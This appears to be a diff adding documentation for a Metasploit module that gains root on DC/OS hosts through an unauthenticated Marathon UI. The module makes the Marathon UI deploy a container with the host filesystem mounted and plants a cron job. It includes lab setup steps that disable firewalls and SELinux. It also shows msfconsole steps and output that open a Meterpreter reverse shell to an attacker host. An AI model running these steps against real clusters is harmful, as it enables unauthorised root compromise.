|
| 1 | +# Vulnerable Application |
| 2 | +Utilizing the DCOS Cluster's Marathon UI, an attacker can create |
| 3 | +a docker container with the '/' path mounted with read/write |
| 4 | +permissions on the host server that is running the docker container. |
| 5 | +As the docker container executes command as uid 0 it is honored |
| 6 | +by the host operating system allowing the attacker to edit/create |
| 7 | +files owed by root. This exploit abuses this to creates a cron job |
| 8 | +in the '/etc/cron.d/' path of the host server. |
| 9 | + |
| 10 | +*Notes: The docker image must be a valid docker image from |
| 11 | +hub.docker.com. Further more the docker container will only |
| 12 | +deploy if there are resources available in the DC/OS |
| 13 | + |
| 14 | +## DCOS |
| 15 | +This Exploit was tested with CentOS 7 as the host operating system for |
| 16 | +the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with |
| 17 | +Default 'custom' installation for on site premise setup. Only the Install |
| 18 | +part of the DCOS guide was completed, the system hardening and securing |
| 19 | +your cluster section where skipped. This is to represent a 'Default' install |
| 20 | +with a system admin conducting hasty deployments taking no thought about security. |
| 21 | + |
| 22 | + |
| 23 | +## To Setup Your Cluster |
| 24 | +I recommend doing a 'on-premise'/custom |
| 25 | +cluster. https://dcos.io/docs/1.8/administration/installing/custom/ |
| 26 | +Create a virtual CentOS machine, install requirements base on the above |
| 27 | +guide. |
| 28 | + |
| 29 | +```bash |
| 30 | +# The TLDR from the above guide |
| 31 | +sudo systemctl stop firewalld && sudo systemctl disable firewalld |
| 32 | +sudo yum install -y tar xz unzip curl ipset ntp |
| 33 | +sudo systemctl start ntpd |
| 34 | +sudo systemctl enable ntpd |
| 35 | +sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \ |
| 36 | + sudo groupadd nogroup && sudo reboot |
| 37 | +``` |
| 38 | + |
| 39 | +Install a supported version of docker on the CentOS systems |
| 40 | +https://dcos.io/docs/1.8/administration/installing/custom/system-requirements/install-docker-centos/ |
| 41 | + |
| 42 | +```bash |
| 43 | +# The TLDR of the above guide |
| 44 | +sudo yum -y remove docker docker-common container-selinux |
| 45 | +sudo yum -y remove docker-selinux |
| 46 | +sudo yum install -y yum-utils |
| 47 | +sudo yum-config-manager \ |
| 48 | + --add-repo \ |
| 49 | + https://docs.docker.com/engine/installation/linux/repo_files/centos/docker.repo |
| 50 | +sudo yum-config-manager --enable docker-testing |
| 51 | +sudo yum makecache fast |
| 52 | +sudo yum -y install docker-engine-1.11.2 |
| 53 | +sudo systemctl start docker |
| 54 | +sudo systemctl enable docker |
| 55 | +sudo echo overlay > /etc/modules-load.d/overlay.conf |
| 56 | +sudo reboot |
| 57 | +``` |
| 58 | + |
| 59 | +Once the CentOS machine has rebooted, edit the systemctl |
| 60 | +service file for docker and change the ExecStart- line to |
| 61 | +`ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://` |
| 62 | +restart the docker service and verify it is running. |
| 63 | +lastly generate ssh rsa keys for authentication. And update the |
| 64 | +/etc/ssh/sshd_config file to support root login. |
| 65 | + |
| 66 | +```bash |
| 67 | +ssh-keygen -t rsa -b 4096 |
| 68 | +# Press enter until complete, DO NOT PUT A PASSWORD. |
| 69 | +cp ~/.ssh/id_rsa.pub ~/.ssh/authorized_keys |
| 70 | +cat ~/.ssh/id_rsa # save the output you will need it for later |
| 71 | +rm ~/.ssh/id_rsa # before doing this make sure you have saved a copy for later |
| 72 | +``` |
| 73 | + |
| 74 | +Shut down the CentOS vm, take a snapshot. (This will be your base) |
| 75 | +clone the VM 2 times. One will be DCOS-Master, the Other DCOS-Agent. |
| 76 | +Start the DCOS-Master and DCOS-Agent virtual machines You just cloned. |
| 77 | +Login and get their current IP address. |
| 78 | +* Note: I recommend giving them static IPs if you have further use for the cluster. |
| 79 | + |
| 80 | +From here use another Linux machine with docker installed to finish |
| 81 | +the installation process. I used an Ubuntu machine with docker installed. |
| 82 | + |
| 83 | +Follow the custom CLI guide for creating the required files in |
| 84 | +the genconf folder. |
| 85 | +https://dcos.io/docs/1.8/administration/installing/custom/cli/ |
| 86 | + |
| 87 | +Example genconf/config.yaml |
| 88 | +``` |
| 89 | +--- |
| 90 | +agent_list: |
| 91 | +- 192.168.0.10 |
| 92 | +bootstrap_url: file:///opt/dcos_install_tmp |
| 93 | +cluster_name: DCOS |
| 94 | +exhibitor_storage_backend: static |
| 95 | +ip_detect_filename: /genconf/ip-detect |
| 96 | +master_discovery: static |
| 97 | +master_list: |
| 98 | +- 192.168.0.9 |
| 99 | +process_timeout: 10000 |
| 100 | +resolvers: |
| 101 | +- 8.8.8.8 |
| 102 | +- 8.8.4.4 |
| 103 | +ssh_port: 22 |
| 104 | +ssh_user: root |
| 105 | +``` |
| 106 | +Example genconf/ip-detect |
| 107 | +```bash |
| 108 | +#!/usr/bin/env bash |
| 109 | +set -o nounset -o errexit |
| 110 | +export PATH=/usr/sbin:/usr/bin:$PATH |
| 111 | +ip=$(ip addr show ens33) |
| 112 | +echo $( echo $ip | grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1) |
| 113 | +``` |
| 114 | + |
| 115 | +place your id_rsa ssh key into the genconf file and rename the |
| 116 | +file to ssh_key and `chmod 0600 genconf/ssh_key` |
| 117 | + |
| 118 | +Deploying the cluster |
| 119 | +in the folder containing the genconf folder do the following. |
| 120 | +NOTE: if following the cli install from DCOS itself, it will fail |
| 121 | +if you do --install-prereqs. It will install an unsupported version of |
| 122 | +docker. |
| 123 | + |
| 124 | +```bash |
| 125 | +curl -O https://downloads.dcos.io/dcos/stable/dcos_generate_config.sh |
| 126 | +chmod +x dcos_generate_config.sh |
| 127 | +sudo ./dcos_generate_config.sh --genconf |
| 128 | +sudo ./dcos_generate_config.sh --preflight |
| 129 | +# If all preflight checks pass |
| 130 | +sudo ./dcos_generate_config.sh --deploy |
| 131 | +# get a cup of coffie |
| 132 | +# wait a minute or two after deploy completes |
| 133 | +sudo bash dcos_generate_config.sh --postflight |
| 134 | +``` |
| 135 | + |
| 136 | +If all is passing navigate to http://[master_ip]:8080/ |
| 137 | +You should see the Marathon UI web application. |
| 138 | + |
| 139 | +# Exploitation |
| 140 | +This module is designed for the attacker to leverage, creation of a |
| 141 | +docker container with out authentication through the DCOS Marathon UI |
| 142 | +to gain root access to the hosting server of the docker container |
| 143 | +in the DCOS cluster. |
| 144 | + |
| 145 | +## Options |
| 146 | +- DOCKERIMAGE is the hub.docker.com docker container image you are wanting to have the DCOS Cluster to deploy for this exploit. |
| 147 | +- TARGETURI this is the path to make the Marathon UI web request to. By default this is /v2/apps |
| 148 | +- WAIT_TIMEOUT is how long you will wait for a docker container to deploy before bailing out if it does not start. |
| 149 | +- CONTAINER_ID is optional if you want to have your container docker have a human readable name else it will be randomly generated |
| 150 | + |
| 151 | +## Steps to exploit with module |
| 152 | +- [ ] Start msfconsole |
| 153 | +- [ ] use exploit/linux/http/dcos_marathon |
| 154 | +- [ ] Set the options appropriately and set VERBOSE to true |
| 155 | +- [ ] Verify it creates a docker container and it successfully runs |
| 156 | +- [ ] After a minute a session should be opened from the agent server |
| 157 | + |
| 158 | +## Example Output |
| 159 | +``` |
| 160 | +msf > use exploit/linux/http/dcos_marathon |
| 161 | +msf exploit(dcos_marathon) > set RHOST 192.168.0.9 |
| 162 | +RHOST => 192.168.0.9 |
| 163 | +msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp |
| 164 | +payload => python/meterpreter/reverse_tcp |
| 165 | +msf exploit(dcos_marathon) > set LHOST 192.168.0.100 |
| 166 | +LHOST => 192.168.0.100 |
| 167 | +msf exploit(dcos_marathon) > set verbose true |
| 168 | +verbose => true |
| 169 | +msf exploit(dcos_marathon) > check |
| 170 | +[*] 192.168.0.9:8080 The target appears to be vulnerable. |
| 171 | +msf exploit(dcos_marathon) > exploit |
| 172 | +
|
| 173 | +[*] Started reverse TCP handler on 192.168.0.100:4444 |
| 174 | +[*] Setting container json request variables |
| 175 | +[*] Creating the docker container command |
| 176 | +[*] The docker container is created, waiting for it to deploy |
| 177 | +[*] Waiting up to 60 seconds for docker container to start |
| 178 | +[*] The docker container is running, removing it |
| 179 | +[*] Waiting for the cron job to run, can take up to 60 seconds |
| 180 | +[*] Sending stage (39690 bytes) to 192.168.0.10 |
| 181 | +[*] Meterpreter session 1 opened (192.168.0.100:4444 -> 192.168.0.10:54468) at 2017-03-01 14:22:02 -0500 |
| 182 | +[+] Deleted /etc/cron.d/FOWkTeZL |
| 183 | +[+] Deleted /tmp/TIWpOfUR |
| 184 | +
|
| 185 | +meterpreter > sysinfo |
| 186 | +Computer : localhost.localdomain |
| 187 | +OS : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UTC 2016 |
| 188 | +Architecture : x64 |
| 189 | +System Language : en_US |
| 190 | +Meterpreter : python/linux |
| 191 | +meterpreter > |
| 192 | +``` |
0 commit comments